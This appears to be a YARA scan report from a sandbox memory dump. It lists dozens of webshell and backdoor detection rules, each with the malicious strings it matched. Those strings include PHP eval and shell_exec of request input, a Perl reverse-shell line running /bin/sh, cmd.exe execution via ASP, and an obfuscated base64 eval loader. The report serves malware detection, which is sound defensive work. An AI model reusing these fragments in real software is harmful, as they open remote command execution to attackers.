00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_11 | PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php | Florian Roth | - 0x48ed8:$s5: $filename = $backupstring."$filename";
- 0x48f03:$s6: while ($file = readdir($folder)) {
- 0x48f2a:$s7: if($file != "." && $file != "..")
- 0x48f50:$s9: $backupstring = "copy_of_";
- 0x48f71:$s10: if( file_exists($file_name))
- 0x48f93:$s13: global $file_name, $filename;
- 0x48fb6:$s16: copy($file,"$filename");
- 0x48fd4:$s18: <td width="49%" height="142">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell__findsock_php_findsock_shell_php_reverse_shell | PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php | Florian Roth | - 0x49182:$s1: // me at pentestmonkey@pentestmonkey.net
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | WebShell_Generic_PHP_6 | PHP Webshells Github Archive - from files c0derz shell [csh | unknown | - 0x49331:$s2: @eval(stripslashes($_POST['phpcode']));
- 0x4935d:$s5: echo shell_exec($com);
- 0x49378:$s7: if($sertype == "winda"){
- 0x49395:$s8: function execute($com)
- 0x493b1:$s12: echo decode(execute($cmd));
- 0x493d2:$s15: echo system($com);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Unpack_Injectt | Webshells Auto-generated - file Injectt.exe | Yara Bulk Rule Generator by Florian Roth | - 0x494a2:$s2: %s -Run -->To Install And Run The Service
- 0x494ed:$s3: %s -Uninstall -->To Uninstall The Service
- 0x49532:$s4: (STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_fso | Webshells Auto-generated - file fso.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4963f:$s0: PageFSO Below -->
- 0x4965a:$s1: theFile.writeLine("<script language=""vbscript"" runat=server>if request("""&cli
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_ssh | Webshells Auto-generated - file ssh.php | Yara Bulk Rule Generator by Florian Roth | - 0x49772:$s0: eval(gzinflate(str_rot13(base64_decode('
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Debug_BDoor | Webshells Auto-generated - file BDoor.dll | Yara Bulk Rule Generator by Florian Roth | - 0x49853:$s1: \BDoor\
- 0x4c013:$s1: \BDoor\
- 0x52bcc:$s1: \BDoor\
- 0x16fd9:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- 0x4985f:$s4: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | bin_Client | Webshells Auto-generated - file Client.exe | Yara Bulk Rule Generator by Florian Roth | - 0x49945:$s0: Recieved respond from server!!
- 0x49968:$s4: packet door client
- 0x4997f:$s5: input source port(whatever you want):
- 0x499a9:$s7: Packet sent,waiting for reply...
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ZXshell2_0_rar_Folder_ZXshell | Webshells Auto-generated - file ZXshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x49a96:$s0: WPreviewPagesn
- 0x49aa9:$s1: DA!OLUTELY N
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | RkNTLoad | Webshells Auto-generated - file RkNTLoad.exe | Yara Bulk Rule Generator by Florian Roth | - 0x49b6e:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x4e8b9:$s1: $Info: This file is packed with the UPX executable packer http://upx.tsx.org $
- 0x49bc1:$s2: 5pur+virtu!
- 0x49d56:$s2: 5pur+virtu!
- 0x49bd1:$s3: ugh spac#n
- 0x49be0:$s4: xcEx3WriL4
- 0x49bef:$s5: runtime error
- 0x49c01:$s6: loseHWait.Sr.
- 0x49c13:$s7: essageBoxAw
- 0x49c23:$s8: $Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | binder2_binder2 | Webshells Auto-generated - file binder2.exe | Yara Bulk Rule Generator by Florian Roth | - 0x49d2c:$s0: IsCharAlphaNumericA
- 0x49d44:$s2: WideCharToM
- 0x49d54:$s4: g 5pur+virtu!
- 0x49d66:$s5: \syslog.en
- 0x49d75:$s6: heap7'7oqk?not=
- 0x49d89:$s8: - Kablto in
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | thelast_orice2 | Webshells Auto-generated - file orice2.php | Yara Bulk Rule Generator by Florian Roth | - 0x49e51:$s0: $aa = $_GET['aa'];
- 0x49e69:$s1: echo $aa;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_sincap | Webshells Auto-generated - file sincap.php | Yara Bulk Rule Generator by Florian Roth | - 0x49f2d:$s0: <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">
- 0x49f82:$s4: <body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PhpShell | Webshells Auto-generated - file PhpShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4a08b:$s2: href="http://www.gimpster.com/wiki/PhpShell">www.gimpster.com/wiki/PhpShell</a>.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_config | Webshells Auto-generated - file config.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4a19e:$s0: const adminPassword="
- 0x4a1b8:$s2: const userPassword="
- 0x4a1d1:$s3: const mVersion=
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sendmail | Webshells Auto-generated - file sendmail.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4a299:$s3: _NextPyC808
- 0x4a2a9:$s6: Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_zehir4 | Webshells Auto-generated - file zehir4.asp | Yara Bulk Rule Generator by Florian Roth |
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hkshell_hkshell | Webshells Auto-generated - file hkshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4a479:$s1: PrSessKERNELU
- 0x4a48b:$s2: Cur3ntV7sion
- 0x4a49c:$s3: Explorer8
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | iMHaPFtp | Webshells Auto-generated - file iMHaPFtp.php | Yara Bulk Rule Generator by Florian Roth | - 0x4a55e:$s1: echo "\t<th class=\"permission_header\"><a href=\"$self?{$d}sort=permission$r\">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Unpack_TBack | Webshells Auto-generated - file TBack.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4a668:$s5: \final\new\lcc\public.dll
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DarkSpy105 | Webshells Auto-generated - file DarkSpy105.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4a73e:$s7: Sorry,DarkSpy got an unknown exception,please re-run it,thanks!
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | EditServer_Webshell | Webshells Auto-generated - file EditServer.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4a83e:$s2: Server %s Have Been Configured
- 0x4a861:$s5: The Server Password Exceeds 32 Characters
- 0x4a88f:$s8: 9--Set Procecess Name To Inject DLL
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_reader | Webshells Auto-generated - file reader.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4a96d:$s2: mailto:mailbomb@hotmail.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | ASP_CmdAsp | Webshells Auto-generated - file CmdAsp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4aa3e:$s2: ' -- Read the output from our command and remove the temp file -- '
- 0x1c51b:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s6: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aad1:$s9: ' -- create the COM objects that we will be using -- '
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | KA_uShell | Webshells Auto-generated - file KA_uShell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4abc2:$s5: if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass
- 0x2b2ce:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
- 0x4ac0a:$s6: if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PHP_Backdoor_v1 | Webshells Auto-generated - file PHP Backdoor v1.php | Yara Bulk Rule Generator by Florian Roth | - 0x4ad10:$s5: echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$th
- 0x4ad5c:$s8: echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | svchostdll | Webshells Auto-generated - file svchostdll.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4ae47:$s0: InstallService
- 0x4ae5a:$s1: RundllInstallA
- 0x4ae6d:$s2: UninstallService
- 0x4ae82:$s3: &G3 Users In RegistryD
- 0x4ae9d:$s4: OL_SHUTDOWN;I
- 0x4aeaf:$s5: SvcHostDLL.dll
- 0x4aec2:$s6: RundllUninstallA
- 0x4aed7:$s7: InternetOpenA
- 0x4aee9:$s8: Check Cloneomplete
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_server | Webshells Auto-generated - file server.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4afbe:$s0: PageServer Below -->
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | vanquish | Webshells Auto-generated - file vanquish.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4b090:$s3: You cannot delete protected files/folders! Instead, your attempt has been logged
- 0x4b0e5:$s8: ?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU
- 0x4b13a:$s9: ?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | winshell | Webshells Auto-generated - file winshell.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4b243:$s0: Software\Microsoft\Windows\CurrentVersion\RunServices
- 0x4b27d:$s1: WinShell Service
- 0x4b292:$s2: __GLOBAL_HEAP_SELECTED
- 0x4b2ad:$s3: __MSVCRT_HEAP_SELECT
- 0x4b2c6:$s4: Provide Windows CmdShell Service
- 0x4b2eb:$s5: URLDownloadToFileA
- 0x4b302:$s6: RegisterServiceProcess
- 0x4b31d:$s7: GetModuleBaseNameA
- 0x4b334:$s8: WinShell v5.0 (C)2002 janker.org
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_remview | Webshells Auto-generated - file remview.php | Yara Bulk Rule Generator by Florian Roth | - 0x4b411:$s2: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
- 0x4b466:$s3: echo "<script>str$i=\"".str_replace("\"","\\\"",str_replace("\\","\\\\"
- 0x4b4bb:$s4: echo "<hr size=1 noshade>\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n<
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | saphpshell | Webshells Auto-generated - file saphpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4b5c8:$s0: <td><input type="text" name="command" size="60" value="<?=$_POST['command']?>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop2006_rar_Folder_2006Z | Webshells Auto-generated - file 2006Z.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4b6dd:$s1: wangyong,czy,allen,lcx,Marcos,kEvin1986,myth
- 0x4b70e:$s8: System\CurrentControlSet\Control\Keyboard Layouts\%.8x
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | admin_ad | Webshells Auto-generated - file admin-ad.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4b7fd:$s6: <td align="center"> <input name="cmd" type="text" id="cmd" siz
- 0x4b840:$s7: Response.write"<a href='"&url&"?path="&Request("oldpath")&"&attrib="&attrib&"'><
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_casus15 | Webshells Auto-generated - file casus15.php | Yara Bulk Rule Generator by Florian Roth | - 0x4b94d:$s6: if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!=".."))
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | BIN_Client | Webshells Auto-generated - file Client.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4ba46:$s0: =====Remote Shell Closed=====
- 0x4ba68:$s2: All Files(*.*)|*.*||
- 0x4ba81:$s6: WSAStartup Error!
- 0x4ba97:$s7: SHGetFileInfoA
- 0x4baaa:$s8: CreateThread False!
- 0x4bac2:$s9: Port Number Error
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_uptime | Webshells Auto-generated - file uptime.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4bb9c:$s0: JDiamondCSlC~
- 0x4bbae:$s1: CharactQA
- 0x4bbbc:$s2: $Info: This file is packed with the UPX executable packer $
- 0x5000e:$s2: $Info: This file is packed with the UPX executable packer $
- 0x4bbfc:$s5: HandlereateConso
- 0x4bc11:$s7: ION\System\FloatingPo
- 0x500a1:$s7: ION\System\FloatingPo
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Simple_PHP_BackDooR | Webshells Auto-generated - file Simple_PHP_BackDooR.php | Yara Bulk Rule Generator by Florian Roth | - 0x4bcf5:$s0: <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he
- 0x24556:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x4bd4a:$s6: if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn
- 0x3fdc4:$s9: // a simple php backdoor
- 0x4bd99:$s9: // a simple php backdoor
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | sig_2005Gray | Webshells Auto-generated - file 2005Gray.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4be6e:$s0: SCROLLBAR-FACE-COLOR: #e8e7e7;
- 0x4be91:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x4c999:$s4: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x4bee6:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x4c9ee:$s8: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x4bf31:$s9: SCROLLBAR-3DLIGHT-COLOR: #cccccc;
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | DllInjection | Webshells Auto-generated - file DllInjection.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4c013:$s0: \BDoor\DllInjecti
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Mithril_v1_45_Mithril | Webshells Auto-generated - file Mithril.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4c0e9:$s2: cress.exe
- 0x4fb5f:$s2: cress.exe
- 0x4c0f7:$s7: \Debug\Mithril.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hkshell_hkrmv | Webshells Auto-generated - file hkrmv.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4c1c1:$s5: /THUMBPOSITION7
- 0x4c1d5:$s6: \EvilBlade\
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | phpshell | Webshells Auto-generated - file phpshell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4c299:$s1: echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><b
- 0x4c2ee:$s2: $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_UR
- 0x4c343:$s3: $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\",
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_cmd | Webshells Auto-generated - file cmd.asp | Yara Bulk Rule Generator by Florian Roth | - 0x1c490:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x20c09:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x248fd:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x425d1:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x4c448:$s0: <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
- 0x1c51b:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x24943:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x42548:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4aa86:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
- 0x4c48e:$s1: Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_phpft | Webshells Auto-generated - file phpft.php | Yara Bulk Rule Generator by Florian Roth | - 0x4c5a0:$s6: PHP Files Thief
- 0x2d6e4:$s11: http://www.4ngel.net
- 0x33267:$s11: http://www.4ngel.net
- 0x4c5b5:$s11: http://www.4ngel.net
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_indexer | Webshells Auto-generated - file indexer.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4c686:$s3: <td>Nereye :<td><input type="text" name="nereye" size=25></td><td><input type="r
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | r57shell | Webshells Auto-generated - file r57shell.php | Yara Bulk Rule Generator by Florian Roth | - 0x4c790:$s11: $_POST['cmd']="echo \"Now script try connect to
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | bdcli100 | Webshells Auto-generated - file bdcli100.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4c879:$s5: unable to connect to
- 0x4c893:$s8: backdoor is corrupted on
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_2005Red | Webshells Auto-generated - file 2005Red.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4c971:$s0: scrollbar-darkshadow-color:#FF9DBB;
- 0x4be91:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x4c999:$s3: echo " <a href=""/"&encodeForUrl(theHref,false)&""" target=_blank>"&replace
- 0x4bee6:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
- 0x4c9ee:$s9: theHref=mid(replace(lcase(list.path),lcase(server.mapPath("/")),""),2)
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop2006_rar_Folder_2006X2 | Webshells Auto-generated - file 2006X2.exe | Yara Bulk Rule Generator by Florian Roth | - 0x45c80:$s2: Powered By
- 0x4cafe:$s2: Powered By
- 0x4cb0e:$s3: " onClick="this.form.sharp.name=this.form.password.value;this.form.action=this.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rdrbs084 | Webshells Auto-generated - file rdrbs084.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4cc17:$s0: Create mapped port. You have to specify domain when using HTTP type.
- 0x4cc60:$s8: <LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_CaseSwitch_2005 | Webshells Auto-generated - file 2005.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4cd6d:$s1: MSComDlg.CommonDialog
- 0x4cd87:$s2: CommonDialog1
- 0x4cd99:$s3: __vbaExceptHandler
- 0x50c80:$s3: __vbaExceptHandler
- 0x4cdb0:$s4: EVENT_SINK_Release
- 0x50c97:$s4: EVENT_SINK_Release
- 0x4cdc7:$s5: EVENT_SINK_AddRef
- 0x4cddd:$s6: By Marcos
- 0x4cdeb:$s7: EVENT_SINK_QueryInterface
- 0x4ce09:$s8: MethCallEngine
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | eBayId_index3 | Webshells Auto-generated - file index3.php | Yara Bulk Rule Generator by Florian Roth | - 0x4ced3:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
- 0x4ff05:$s8: $err = "<i>Your Name</i> Not Entered!</font></h2>Sorry, \"You
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_phvayv | Webshells Auto-generated - file phvayv.php | Yara Bulk Rule Generator by Florian Roth | - 0x4cfcb:$s2: wrap="OFF">XXXX</textarea></font><font face
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | byshell063_ntboot | Webshells Auto-generated - file ntboot.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4d0b6:$s0: SYSTEM\CurrentControlSet\Services\NtBoot
- 0x4d0e3:$s1: Failure ... Access is Denied !
- 0x4de01:$s1: Failure ... Access is Denied !
- 0x4d106:$s2: Dumping Description to Registry...
- 0x4de4a:$s2: Dumping Description to Registry...
- 0x4d12d:$s3: Opening Service .... Failure !
- 0x4de71:$s3: Opening Service .... Failure !
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_casus15_2 | Webshells Auto-generated - file casus15.php | Yara Bulk Rule Generator by Florian Roth | - 0x3112c:$s0: copy ( $dosya_gonder
- 0x4d20a:$s0: copy ( $dosya_gonder
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | installer | Webshells Auto-generated - file installer.cmd | Yara Bulk Rule Generator by Florian Roth | - 0x4d2d9:$s0: Restore Old Vanquish
- 0x4d2f2:$s4: ReInstall Vanquish
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | uploader | Webshells Auto-generated - file uploader.php | Yara Bulk Rule Generator by Florian Roth | - 0x328fe:$s0: move_uploaded_file($userfile, "entrika.php");
- 0x41385:$s0: move_uploaded_file($userfile, "entrika.php");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_remview_2 | Webshells Auto-generated - file remview.php | Yara Bulk Rule Generator by Florian Roth | - 0x4d3c3:$s0: <xmp>$out</
- 0x4d3d3:$s1: .mm("Eval PHP code").
- 0x4fa02:$s1: .mm("Eval PHP code").
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_r57 | Webshells Auto-generated - file r57.php | Yara Bulk Rule Generator by Florian Roth | - 0x4d4b0:$s1: $sql = "LOAD DATA INFILE \"".$_POST['test3_file'].
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop2006_rar_Folder_2006X | Webshells Auto-generated - file 2006X.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4d5aa:$s1: <input name="password" type="password" id="password"
- 0x4d5e3:$s6: name="theAction" type="text" id="theAction"
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_phvayv_2 | Webshells Auto-generated - file phvayv.php | Yara Bulk Rule Generator by Florian Roth | - 0x4d6cb:$s2: rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | elmaliseker | Webshells Auto-generated - file elmaliseker.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4d7c5:$s0: javascript:Command('Download'
- 0x4d7e7:$s5: zombie_array=array(
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_resolve | Webshells Auto-generated - file resolve.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4d8c5:$s0: 3^n6B(Ed3
- 0x4d8d3:$s1: ^uldn'Vt(x
- 0x4d8e2:$s2: \= uPKfp
- 0x4d8ef:$s3: 'r.axV<ad
- 0x4d8fd:$s4: p,modoi$=sr(
- 0x4d90e:$s5: DiamondC8S t
- 0x4d91f:$s6: `lQ9fX<ZvJW
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_RemExp | Webshells Auto-generated - file RemExp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4d9e5:$s1: <td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.Ser
- 0x4da3a:$s5: <td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=F
- 0x4da8f:$s6: <td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_tool | Webshells Auto-generated - file tool.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4db96:$s7: ""%windir%\\calc.exe"")
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FeliksPack3___PHP_Shells_2005 | Webshells Auto-generated - file 2005.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4dc77:$s0: window.open(""&url&"?id=edit&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp
- 0x4dccc:$s3: <input name="dbname" type="hidden" id="dbname" value="<%=request("dbname")%>">
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | byloader | Webshells Auto-generated - file byloader.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4ddd3:$s0: SYSTEM\CurrentControlSet\Services\NtfsChk
- 0x4d0e3:$s1: Failure ... Access is Denied !
- 0x4de01:$s1: Failure ... Access is Denied !
- 0x4de24:$s2: NTFS Disk Driver Checking Service
- 0x4d106:$s3: Dumping Description to Registry...
- 0x4de4a:$s3: Dumping Description to Registry...
- 0x4d12d:$s4: Opening Service .... Failure !
- 0x4de71:$s4: Opening Service .... Failure !
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | shelltools_g0t_root_Fport | Webshells Auto-generated - file Fport.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4df56:$s4: Copyright 2000 by Foundstone, Inc.
- 0x4df7d:$s5: You must have administrator privileges to run fport - exiting...
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | BackDooR__fr_ | Webshells Auto-generated - file BackDooR (fr).php | Yara Bulk Rule Generator by Florian Roth | - 0x4e080:$s3: print("<p align=\"center\"><font size=\"5\">Exploit include
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_ntdaddy | Webshells Auto-generated - file ntdaddy.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4e179:$s1: <input type="text" name=".CMD" size="45" value="<%= szCMD %>"> <input type="s
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | nstview_nstview | Webshells Auto-generated - file nstview.php | Yara Bulk Rule Generator by Florian Roth | - 0x4e285:$s4: open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | HYTop_DevPack_upload | Webshells Auto-generated - file upload.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4e398:$s0: PageUpload Below -->
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | PasswordReminder | Webshells Auto-generated - file PasswordReminder.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4e47a:$s3: The encoded password is found at 0x%8.8lx and has a length of %d.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Pack_InjectT | Webshells Auto-generated - file InjectT.exe | Yara Bulk Rule Generator by Florian Roth | - 0x4e577:$s3: ail To Open Registry
- 0x52ad8:$s3: ail To Open Registry
- 0x4e590:$s4: 32fDssignim
- 0x4e5a0:$s5: vide Internet S
- 0x4e5b4:$s6: d]Software\M
- 0x4e5c5:$s7: TInject.Dll
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_RemExp_2 | Webshells Auto-generated - file RemExp.asp | Yara Bulk Rule Generator by Florian Roth | - 0x4e68d:$s2: Then Response.Write "
- 0x4e6a8:$s3: <a href= "<%=Request.ServerVariables("script_name")%>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | FSO_s_c99 | Webshells Auto-generated - file c99.php | Yara Bulk Rule Generator by Florian Roth | - 0x4e792:$s2: "txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htacce
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | rknt_zip_Folder_RkNT | Webshells Auto-generated - file RkNT.dll | Yara Bulk Rule Generator by Florian Roth | - 0x4e895:$s0: PathStripPathA
